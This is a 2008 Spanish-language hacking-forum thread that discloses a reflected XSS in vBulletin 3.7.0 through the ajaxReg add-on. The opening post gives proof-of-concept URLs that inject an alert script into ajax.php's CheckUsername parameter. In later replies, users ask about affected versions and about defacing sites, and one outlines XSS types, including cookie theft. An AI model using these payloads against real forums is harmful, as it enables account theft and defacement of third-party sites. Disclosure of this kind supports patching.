elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  [°] [UP] vBulletin 3.7.0 xss
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [°] [UP] vBulletin 3.7.0 xss  (Leído 7,217 veces)
6666

Desconectado Desconectado

Mensajes: 146


Wikileaks.org


Ver Perfil
[°] [UP] vBulletin 3.7.0 xss
« en: 14 Mayo 2008, 00:08 am »

"se requiere ajaxReg para explotar la vulnerabilidad"


El error esta en ajaxReg (http://www.vbulletin.org/forum/showthread.php?t=144869) sirve para comprobar los datos cuando se esta escribiendo ..

POC:
http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=XSS

http://www.site.com/foro/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>

http://www.foro-cualquiera.com/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>


:)

publicado en: http://mentespiritual.com/xss.txt
« Última modificación: 12 Agosto 2008, 16:07 pm por sirdarckcat » En línea

_xtr3m3_

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: vBulletin 3.7.0 xss
« Respuesta #1 en: 14 Mayo 2008, 06:46 am »

Y el resto como en el xss de foroswebgratis?
Que otras versiones se joden?

Me sale esto:
Forbidden
You don't have permission to access /foro/ajax.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/1.3.41 Server at www.foro.com Port 80

Se puede hacer algo?  :-\
« Última modificación: 14 Mayo 2008, 09:41 am por _xtr3m3_ » En línea

6666

Desconectado Desconectado

Mensajes: 146


Wikileaks.org


Ver Perfil
Re: vBulletin 3.7.0 xss
« Respuesta #2 en: 14 Mayo 2008, 16:37 pm »

bueno parece que te tiro un error 404 no debe existir o tener el ajaxReg puede ser eso.no todos lo tienen.y por lo de foroswebgratis lo hice con la intenciòn de mostrar como se podria explotar la vulnerabilidad en realidad no se si funciona en foroswebgratis nunca lo probe.

saludos!

si queres buscar xss aca un buen paper http://milw0rm.com/papers/192
« Última modificación: 14 Mayo 2008, 16:40 pm por z1x2c3z1x2c3| » En línea

I_xtr3m3_I

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: vBulletin 3.7.0 xss
« Respuesta #3 en: 17 Mayo 2008, 09:54 am »

No, es del htaccess, pero eso es lo de menos, parece que el ajaxReg que usa el 3.6.8 no es vulnerable a xss, existe alguna para el 3.6.8?

Soy _xtr3m3_, pero cambié el mail a uno incorrecto y no puedo reactvar la otra cuenta y mejor hice esta  :¬¬ a ver si un admin puede hacer algo.

Gracias por el paper, es muy bueno.
saludos
En línea

-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: vBulletin 3.7.0 xss
« Respuesta #4 en: 17 Mayo 2008, 19:53 pm »

Gracias por la info.
Yo anteriormente la vulnerabilidad XSS me pensaba que no era importante pero si la sabes usar le puedes sacar mucho partido.

Por cierto, no creo que sea conveniente exponer información de terceros, es decir, poner una web como ejemplo del bug, lo digo por la web esa de micro-games.com.ar pero bueno no creo que alguien vaya a ir haciendo pruebas en esa ¬¬

ale,
salu2 !
En línea

Aclausus

Desconectado Desconectado

Mensajes: 11



Ver Perfil
Re: vBulletin 3.7.0 xss
« Respuesta #5 en: 16 Julio 2008, 08:55 am »

Amigo, el bug funciona hasta en la ultima version 3.7.2


Ahora, que hago con xss?
Se puede hacer defacing?
como?

En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: vBulletin 3.7.0 xss
« Respuesta #6 en: 16 Julio 2008, 09:05 am »

Amigo, el bug funciona hasta en la ultima version 3.7.2


Ahora, que hago con xss?
Se puede hacer defacing?
como?


si todo fuera asi de facil xD
yo no se como , pero lo mejor es informarte sobre XSS
y ver que podes hacer
saludos
En línea

Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: vBulletin 3.7.0 xss
« Respuesta #7 en: 10 Agosto 2008, 16:59 pm »

Hay 3 clases de XSS , no me se los nombres oficiales pero algo asi:
•El tipo-0, que se utiliza para ejecutar código remotamente con los
permisos de otro usuario.(Robo de cookies etc)
• El tipo-1, ataque no-persistente o reflejado utilizado en páginas no estáticas.
• Y el tipo-2, ataque persistente, donde se inyecta código en
páginas estáticas.
En línea

[/url]
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
CONSULTA: Vulnerabilidad VBulletin
Hacking
Pabloxxx 9 6,618 Último mensaje 15 Julio 2011, 22:41 pm
por Pabloxxx
Vulnerabilidad Vbulletin 4.1.12 [XSS]
Nivel Web
0x6865726e616e 9 4,518 Último mensaje 13 Mayo 2012, 21:50 pm
por ~ Yoya ~
Vulnerabilidades en vBulletin 5
Noticias
wolfbcn 0 1,226 Último mensaje 19 Diciembre 2017, 01:54 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines